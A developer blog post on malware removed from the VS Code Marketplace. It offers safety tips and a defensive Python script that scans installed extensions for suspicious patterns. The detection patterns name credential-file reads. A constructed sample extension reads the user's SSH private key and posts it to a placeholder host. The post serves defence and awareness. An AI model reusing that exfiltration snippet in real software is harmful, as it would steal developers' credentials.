Ishaan Agrawal
Concerning Amounts of Malware in the VS Code Marketplace: What Microsoft’s Own Logs Reveal

If you are like me, your VS Code setup is a carefully curated collection of themes, linters, and productivity boosters. We trust the Visual Studio Marketplace to be a safe haven for tools that make our lives easier. But if you take a look under the hood at what is actually getting removed from the platform, the picture gets a lot uglier.

I recently went down a rabbit hole looking at the official list of removed extensions on GitHub, and it is a wake-up call for anyone who blindly clicks "Install."

The "Install First, Ask Questions Later" Problem

The Marketplace is fundamentally reactive. Microsoft does run automated scans, but a staggering amount of malicious code only gets taken down after it has already been published and downloaded by unsuspecting developers.

When you look at the logs of removed extensions, you see a constant stream of entries flagged for things like:

  • Credential Theft: Extensions designed to scrape your .env files or SSH keys.
  • Typosquatting: Malicious clones of popular extensions like Prettier or ESLint that hope you won't notice a tiny misspelling in the name.
  • Remote Access: Plugins that open backdoors into your development environment.

Why This Matters to You

As developers, our machines are high-value targets. We have access to production servers, API keys, proprietary source code, and personal data. A single malicious extension has the same permissions as you do. It can read your files, track your keystrokes, and send your data to a remote server without you ever seeing a popup.

The scary part isn't just that these extensions exist. It is that they are actively making it onto the store, staying there for days or weeks, and only getting purged after the damage might already be done.

How to Protect Your Workflow

You don't have to stop using extensions, but you do need to stop treating the Marketplace like a curated app store where everything is vetted. Here is how I have changed my approach:

  1. Check the Publisher: Look for the "Verified" checkmark. If a popular tool is being published by a random account with no history, stay away.
  2. Verify the Numbers: If an extension claims to be a popular tool but only has 500 downloads while the real one has 5 million, you are looking at a typosquatting attempt.
  3. Audit Your List: Every few months, go through your installed extensions. If something hasn't been updated in years, maybe double-check its safety.
  4. Do a Deeper Scan: Since we know malicious code can bypass basic store filters, you need a more aggressive way to vet what you are installing. I suggest using a VS Code extension security analyzer. It will perform a deep security assessment by looking for obfuscated code, hidden network connections, and dangerous dependencies that standard checks often miss. That will give you a clear risk report before you let the code touch your machine.
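Steps 3 and 4 can be started locally before reaching for a separate analyzer. The script below is an added example, not code from the post or from any marketplace tool: it walks the local extensions folder (assumed to be `~/.vscode/extensions`, the default on Linux and macOS), parses each `package.json`, and flags the source patterns the post names (credential-file reads, hard-coded network endpoints, shell execution, dynamic code execution, large base64-like blobs). The sample extension, its publisher and the `collector.example` host are constructed for the demonstration.

```python
import json
import re
from pathlib import Path
# Source-level indicators a reviewer would flag before trusting an extension
# that runs with the user's own permissions. Illustrative, not exhaustive.
INDICATORS = [
    (r"\beval\s*\(|new\s+Function\s*\(", "dynamic code execution"),
    (r"\bchild_process\b|\bexecSync?\s*\(", "spawns shell commands"),
    (r"id_rsa|/\.ssh/|[\"'/]\.env\b", "reads credential-bearing files"),
    (r"https?://[^\s'\"`]+", "hard-coded network endpoint"),
    (r"[A-Za-z0-9+/]{120,}={0,2}", "long base64-like blob (possible packed payload)"),
]

def scan_source(text: str) -> list:
    """Return (description, snippet) for every indicator hit in one JS file."""
    return [(desc, m.group(0)[:60])
            for pattern, desc in INDICATORS for m in re.finditer(pattern, text)]

def audit(manifest: dict, sources: dict) -> dict:
    """Audit one extension from its parsed package.json and {path: JS text}."""
    findings = []
    # activationEvents ["*"] runs the extension at every VS Code start, whatever you open.
    if "*" in manifest.get("activationEvents", []):
        findings.append(("activates on every startup", "activationEvents: *"))
    for path, text in sources.items():
        findings += [(d, f"{path}: {s}") for d, s in scan_source(text)]
    kinds = {d for d, _ in findings}
    # Endpoint plus credential read, shell or eval is the exfiltration shape; rank it highest.
    if "hard-coded network endpoint" in kinds and kinds & {"reads credential-bearing files", "spawns shell commands", "dynamic code execution"}:
        risk = "high"
    else:
        risk = "medium" if findings else "low"
    return {"name": manifest.get("name"), "publisher": manifest.get("publisher"), "risk": risk, "findings": findings}

def audit_installed(root: str = "~/.vscode/extensions") -> list:
    """Audit every extension under the local extensions folder (path assumed)."""
    reports = []
    for pkg in Path(root).expanduser().glob("*/package.json"):
        ext = pkg.parent
        js = {str(f.relative_to(ext)): f.read_text(errors="ignore")
              for f in ext.rglob("*.js") if "node_modules" not in f.parts}
        reports.append(audit(json.loads(pkg.read_text()), js))
    return sorted(reports, key=lambda r: ["high", "medium", "low"].index(r["risk"]))

# Constructed sample: a typosquat-style formatter that reads an SSH key and posts it.
SAMPLE_MANIFEST = {"name": "prettier-pro", "publisher": "unknown-dev", "activationEvents": ["*"]}
SAMPLE_SOURCES = {"out/extension.js":
    'const fs=require("fs");const k=fs.readFileSync(process.env.HOME+"/.ssh/id_rsa");'
    'fetch("https://collector.example/upload",{method:"POST",body:k});'}
```

Run `audit_installed()` and read the "high" entries first; a hit is a reason to look at the code and the publisher, not proof of malice, since legitimate extensions also make network calls.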

Final Thoughts

The VS Code Marketplace is an incredible resource, but we have to stop assuming it is inherently safe. The "Removed Packages" list is proof that malware is constantly slipping through the cracks.

Take five minutes today to look at what you have installed. It is much better to spend a few minutes auditing your setup now than to spend a week dealing with a compromised machine later.

What's your take? Do you check the credentials of every extension you install, or do you just hit install and hope for the best?
